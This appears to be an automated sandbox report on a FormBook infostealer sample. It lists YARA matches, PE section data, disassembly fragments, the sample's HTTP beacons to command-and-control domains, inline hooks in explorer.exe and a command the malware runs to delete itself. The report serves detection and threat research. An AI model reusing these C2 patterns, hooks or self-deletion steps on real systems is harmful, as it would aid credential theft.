                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          push 88888888h
                                                                          jmp 00007FC1848F66BDh
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          push 88888888h
                                                                          jmp 00007FC1848F66C0h
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          push 88888888h
                                                                          jmp 00007FC1848F66C3h
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          push 88888888h
                                                                          jmp 00007FC1848F66C6h
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret
                                                                          push 88888888h
                                                                          jmp 00007FC1848F66C9h
                                                                          ret
                                                                          call 00007FC1848F83C5h
                                                                          pop eax
                                                                          ret

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [C++] VS2010 SP1 build 40219
                                                                          • [ASM] VS2010 SP1 build 40219
                                                                          • [LNK] VS2010 SP1 build 40219

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x2d0e40x2d2004d55976a09edf34b27c6c372f1796c5bFalse0.7615997229916898data7.406763653212094IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Feb 15, 2024 12:15:21.485227108 CET4970480192.168.2.6104.21.34.218
                                                                          Feb 15, 2024 12:15:21.602173090 CET8049704104.21.34.218192.168.2.6
                                                                          Feb 15, 2024 12:15:21.602272987 CET4970480192.168.2.6104.21.34.218
                                                                          Feb 15, 2024 12:15:21.602364063 CET4970480192.168.2.6104.21.34.218
                                                                          Feb 15, 2024 12:15:21.719358921 CET8049704104.21.34.218192.168.2.6
                                                                          Feb 15, 2024 12:15:22.111494064 CET4970480192.168.2.6104.21.34.218
                                                                          Feb 15, 2024 12:15:22.229284048 CET8049704104.21.34.218192.168.2.6
                                                                          Feb 15, 2024 12:15:22.229399920 CET4970480192.168.2.6104.21.34.218
                                                                          Feb 15, 2024 12:15:42.103519917 CET4970680192.168.2.6103.224.212.212
                                                                          Feb 15, 2024 12:15:42.252888918 CET8049706103.224.212.212192.168.2.6
                                                                          Feb 15, 2024 12:15:42.253035069 CET4970680192.168.2.6103.224.212.212
                                                                          Feb 15, 2024 12:15:42.253113031 CET4970680192.168.2.6103.224.212.212
                                                                          Feb 15, 2024 12:15:42.423163891 CET8049706103.224.212.212192.168.2.6
                                                                          Feb 15, 2024 12:15:42.423192978 CET8049706103.224.212.212192.168.2.6
                                                                          Feb 15, 2024 12:15:42.423345089 CET4970680192.168.2.6103.224.212.212
                                                                          Feb 15, 2024 12:15:42.423372030 CET4970680192.168.2.6103.224.212.212
                                                                          Feb 15, 2024 12:15:42.572719097 CET8049706103.224.212.212192.168.2.6

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Feb 15, 2024 12:15:21.331434965 CET5512853192.168.2.61.1.1.1
                                                                          Feb 15, 2024 12:15:21.484211922 CET53551281.1.1.1192.168.2.6
                                                                          Feb 15, 2024 12:15:41.862515926 CET6132053192.168.2.61.1.1.1
                                                                          Feb 15, 2024 12:15:42.102526903 CET53613201.1.1.1192.168.2.6
                                                                          Feb 15, 2024 12:16:01.283910036 CET4946553192.168.2.61.1.1.1
                                                                          Feb 15, 2024 12:16:01.420042992 CET53494651.1.1.1192.168.2.6
                                                                          Feb 15, 2024 12:16:21.597021103 CET5563053192.168.2.61.1.1.1
                                                                          Feb 15, 2024 12:16:21.730669975 CET53556301.1.1.1192.168.2.6
                                                                          Feb 15, 2024 12:16:42.849379063 CET5372753192.168.2.61.1.1.1
                                                                          Feb 15, 2024 12:16:43.012341976 CET53537271.1.1.1192.168.2.6

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Feb 15, 2024 12:15:21.331434965 CET192.168.2.61.1.1.10x36ecStandard query (0)www.123bu6.shopA (IP address)IN (0x0001)false
                                                                          Feb 15, 2024 12:15:41.862515926 CET192.168.2.61.1.1.10x3ca4Standard query (0)www.theanhedonia.comA (IP address)IN (0x0001)false
                                                                          Feb 15, 2024 12:16:01.283910036 CET192.168.2.61.1.1.10x6365Standard query (0)www.soulheroes.onlineA (IP address)IN (0x0001)false
                                                                          Feb 15, 2024 12:16:21.597021103 CET192.168.2.61.1.1.10x1613Standard query (0)www.roelofsen.onlineA (IP address)IN (0x0001)false
                                                                          Feb 15, 2024 12:16:42.849379063 CET192.168.2.61.1.1.10xa63bStandard query (0)www.truedatalab.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Feb 15, 2024 12:15:21.484211922 CET1.1.1.1192.168.2.60x36ecNo error (0)www.123bu6.shop104.21.34.218A (IP address)IN (0x0001)false
                                                                          Feb 15, 2024 12:15:21.484211922 CET1.1.1.1192.168.2.60x36ecNo error (0)www.123bu6.shop172.67.165.153A (IP address)IN (0x0001)false
                                                                          Feb 15, 2024 12:15:42.102526903 CET1.1.1.1192.168.2.60x3ca4No error (0)www.theanhedonia.com103.224.212.212A (IP address)IN (0x0001)false
                                                                          Feb 15, 2024 12:16:01.420042992 CET1.1.1.1192.168.2.60x6365Name error (3)www.soulheroes.onlinenonenoneA (IP address)IN (0x0001)false
                                                                          Feb 15, 2024 12:16:21.730669975 CET1.1.1.1192.168.2.60x1613Name error (3)www.roelofsen.onlinenonenoneA (IP address)IN (0x0001)false
                                                                          Feb 15, 2024 12:16:43.012341976 CET1.1.1.1192.168.2.60xa63bNo error (0)www.truedatalab.com0.0.0.0A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • www.123bu6.shop
                                                                          • www.theanhedonia.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.649704104.21.34.218804004C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Feb 15, 2024 12:15:21.602364063 CET169OUTGET /gy14/?Szu8Zp=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f3VYzUg75agPLVEuw==&3fzlqX=DtjxV HTTP/1.1
                                                                          Host: www.123bu6.shop
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649706103.224.212.212804004C:\Windows\explorer.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Feb 15, 2024 12:15:42.253113031 CET174OUTGET /gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV HTTP/1.1
                                                                          Host: www.theanhedonia.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Feb 15, 2024 12:15:42.423163891 CET438INHTTP/1.1 302 Found
                                                                          date: Thu, 15 Feb 2024 11:15:42 GMT
                                                                          server: Apache
                                                                          set-cookie: __tad=1707995742.5560590; expires=Sun, 12-Feb-2034 11:15:42 GMT; Max-Age=315360000
                                                                          location: http://ww25.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV&subid1=20240215-2215-4287-a810-a983fbd73ffa
                                                                          content-length: 2
                                                                          content-type: text/html; charset=UTF-8
                                                                          connection: close
                                                                          Data Raw: 0a 0a
                                                                          Data Ascii:


                                                                          Code Manipulations

                                                                          User Modules

                                                                          Hook Summary

                                                                          Function NameHook TypeActive in Processes
                                                                          PeekMessageAINLINEexplorer.exe
                                                                          PeekMessageWINLINEexplorer.exe
                                                                          GetMessageWINLINEexplorer.exe
                                                                          GetMessageAINLINEexplorer.exe

                                                                          Processes

                                                                          Process: explorer.exe, Module: user32.dll
                                                                          Function NameHook TypeNew Data
                                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE5
                                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE5

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:12:14:38
                                                                          Start date:15/02/2024
                                                                          Path:C:\Users\user\Desktop\jqPZZhDmjh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\jqPZZhDmjh.exe
                                                                          Imagebase:0x970000
                                                                          File size:185'856 bytes
                                                                          MD5 hash:C4127213FC83E9B8D166D5731BAC598A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2118168045.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:12:14:38
                                                                          Start date:15/02/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0x7ff609140000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.3313647278.000000000DF94000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:3
                                                                          Start time:12:14:41
                                                                          Start date:15/02/2024
                                                                          Path:C:\Windows\SysWOW64\raserver.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                          Imagebase:0x880000
                                                                          File size:107'520 bytes
                                                                          MD5 hash:D1053D114847677185F248FF98C3F255
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3301253402.00000000048EF000.00000004.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3300271936.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3300130222.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:4
                                                                          Start time:12:14:45
                                                                          Start date:15/02/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del "C:\Users\user\Desktop\jqPZZhDmjh.exe"
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:12:14:45
                                                                          Start date:15/02/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:1.4%
                                                                            Dynamic/Decrypted Code Coverage:2.7%
                                                                            Signature Coverage:5.8%
                                                                            Total number of Nodes:554
                                                                            Total number of Limit Nodes:60
                                                                            execution_graph 97434 98f080 97437 98b960 97434->97437 97438 98b986 97437->97438 97445 979d30 97438->97445 97440 98b992 97444 98b9b3 97440->97444 97453 97c1b0 97440->97453 97442 98b9a5 97489 98a6a0 97442->97489 97493 979c80 97445->97493 97447 979d3d 97448 979d44 97447->97448 97505 979c20 97447->97505 97448->97440 97454 97c1d5 97453->97454 97913 97b1b0 97454->97913 97456 97c22c 97917 97ae30 97456->97917 97458 97c4a3 97458->97442 97459 97c252 97459->97458 97926 984390 97459->97926 97461 97c297 97461->97458 97929 978a60 97461->97929 97463 97c2db 97463->97458 97940 98a4f0 97463->97940 97467 97c331 97468 97c338 97467->97468 97952 98a000 97467->97952 97469 98bdb0 3 API calls 97468->97469 97471 97c345 97469->97471 97471->97442 97473 97c382 97474 98bdb0 3 API calls 97473->97474 97475 97c389 97474->97475 97475->97442 97476 97c392 97477 97f490 3 API calls 97476->97477 97478 97c406 97477->97478 97478->97468 97479 97c411 97478->97479 97480 98bdb0 3 API calls 97479->97480 97481 97c435 97480->97481 97957 98a050 97481->97957 97484 98a000 2 API calls 97485 97c470 97484->97485 97485->97458 97962 989e10 97485->97962 97488 98a6a0 2 API calls 97488->97458 97490 98a6b2 97489->97490 97491 98af50 LdrLoadDll 97490->97491 97492 98a6bf ExitProcess 97491->97492 97492->97444 97525 988bb0 97493->97525 97497 979ca6 97497->97447 97498 979c9c 97498->97497 97532 98b2a0 97498->97532 97500 979ce3 97500->97497 97543 979aa0 97500->97543 97502 979d03 97549 979620 LdrLoadDll 97502->97549 97504 979d15 97504->97447 97506 979c23 97505->97506 97888 98b590 97506->97888 97509 98b590 LdrLoadDll 97510 979c4b 97509->97510 97511 98b590 LdrLoadDll 97510->97511 97512 979c61 97511->97512 97513 97f170 97512->97513 97514 97f189 97513->97514 97896 97b030 97514->97896 97516 97f19c 97900 98a1d0 97516->97900 97519 979d55 97519->97440 97521 97f1c2 97522 97f1ed 97521->97522 97906 98a250 97521->97906 97524 98a480 2 API calls 97522->97524 97524->97519 97526 988bbf 97525->97526 97550 984e40 97526->97550 97528 979c93 97529 988a60 97528->97529 97556 98a5f0 97529->97556 97533 98b2b9 97532->97533 97563 984a40 97533->97563 97535 98b2d1 97536 98b2da 97535->97536 97602 98b0e0 97535->97602 97536->97500 97538 98b2ee 97538->97536 97620 989ef0 97538->97620 97866 977ea0 97543->97866 97545 979ac1 97545->97502 97546 979aba 97546->97545 97879 978160 97546->97879 97549->97504 97551 984e5a 97550->97551 97552 984e4e 97550->97552 97551->97528 97552->97551 97555 9852c0 LdrLoadDll 97552->97555 97554 984fac 97554->97528 97555->97554 97559 98af50 97556->97559 97558 988a75 97558->97498 97560 98af60 97559->97560 97562 98af82 97559->97562 97561 984e40 LdrLoadDll 97560->97561 97561->97562 97562->97558 97564 984d75 97563->97564 97565 984a54 97563->97565 97564->97535 97565->97564 97628 989c40 97565->97628 97568 984b80 97631 98a350 97568->97631 97569 984b63 97688 98a450 LdrLoadDll 97569->97688 97572 984ba7 97574 98bdb0 3 API calls 97572->97574 97573 984b6d 97573->97535 97576 984bb3 97574->97576 97575 984d39 97578 98a480 2 API calls 97575->97578 97576->97573 97576->97575 97577 984d4f 97576->97577 97582 984c42 97576->97582 97697 984780 LdrLoadDll NtReadFile NtClose 97577->97697 97579 984d40 97578->97579 97579->97535 97581 984d62 97581->97535 97583 984ca9 97582->97583 97585 984c51 97582->97585 97583->97575 97584 984cbc 97583->97584 97690 98a2d0 97584->97690 97587 984c6a 97585->97587 97588 984c56 97585->97588 97591 984c6f 97587->97591 97592 984c87 97587->97592 97689 984640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97588->97689 97634 9846e0 97591->97634 97592->97579 97646 984400 97592->97646 97594 984c60 97594->97535 97596 984d1c 97694 98a480 97596->97694 97597 984c7d 97597->97535 97600 984c9f 97600->97535 97601 984d28 97601->97535 97603 98b0f1 97602->97603 97604 98b103 97603->97604 97715 98bd30 97603->97715 97604->97538 97606 98b124 97609 98b147 97606->97609 97718 984060 97606->97718 97608 98b170 97608->97538 97609->97608 97610 984060 4 API calls 97609->97610 97612 98b169 97610->97612 97612->97608 97743 985380 97612->97743 97613 98b1fa 97615 98b20a 97613->97615 97837 98aef0 LdrLoadDll 97613->97837 97753 98ad60 97615->97753 97617 98b238 97832 989eb0 97617->97832 97621 98af50 LdrLoadDll 97620->97621 97622 989f0c 97621->97622 97857 15f2c0a 97622->97857 97623 989f27 97625 98bdb0 97623->97625 97860 98a660 97625->97860 97627 98b349 97627->97500 97629 984b34 97628->97629 97630 98af50 LdrLoadDll 97628->97630 97629->97568 97629->97569 97629->97573 97630->97629 97632 98af50 LdrLoadDll 97631->97632 97633 98a36c NtCreateFile 97632->97633 97633->97572 97635 9846fc 97634->97635 97636 98a2d0 LdrLoadDll 97635->97636 97637 98471d 97636->97637 97638 984738 97637->97638 97639 984724 97637->97639 97641 98a480 2 API calls 97638->97641 97640 98a480 2 API calls 97639->97640 97642 98472d 97640->97642 97643 984741 97641->97643 97642->97597 97698 98bfc0 LdrLoadDll RtlAllocateHeap 97643->97698 97645 98474c 97645->97597 97647 98444b 97646->97647 97648 98447e 97646->97648 97649 98a2d0 LdrLoadDll 97647->97649 97650 9845c9 97648->97650 97654 98449a 97648->97654 97651 984466 97649->97651 97652 98a2d0 LdrLoadDll 97650->97652 97653 98a480 2 API calls 97651->97653 97656 9845e4 97652->97656 97655 98446f 97653->97655 97657 98a2d0 LdrLoadDll 97654->97657 97655->97600 97711 98a310 LdrLoadDll 97656->97711 97658 9844b5 97657->97658 97660 9844bc 97658->97660 97661 9844d1 97658->97661 97665 98a480 2 API calls 97660->97665 97662 9844ec 97661->97662 97663 9844d6 97661->97663 97674 9844f1 97662->97674 97699 98bf80 97662->97699 97667 98a480 2 API calls 97663->97667 97664 98461e 97668 98a480 2 API calls 97664->97668 97666 9844c5 97665->97666 97666->97600 97670 9844df 97667->97670 97669 984629 97668->97669 97669->97600 97670->97600 97673 984557 97675 98456e 97673->97675 97710 98a290 LdrLoadDll 97673->97710 97681 984503 97674->97681 97702 98a400 97674->97702 97677 98458a 97675->97677 97678 984575 97675->97678 97680 98a480 2 API calls 97677->97680 97679 98a480 2 API calls 97678->97679 97679->97681 97682 984593 97680->97682 97681->97600 97683 9845bf 97682->97683 97705 98bb80 97682->97705 97683->97600 97685 9845aa 97686 98bdb0 3 API calls 97685->97686 97687 9845b3 97686->97687 97687->97600 97688->97573 97689->97594 97691 98af50 LdrLoadDll 97690->97691 97692 984d04 97691->97692 97693 98a310 LdrLoadDll 97692->97693 97693->97596 97695 98af50 LdrLoadDll 97694->97695 97696 98a49c NtClose 97695->97696 97696->97601 97697->97581 97698->97645 97712 98a620 97699->97712 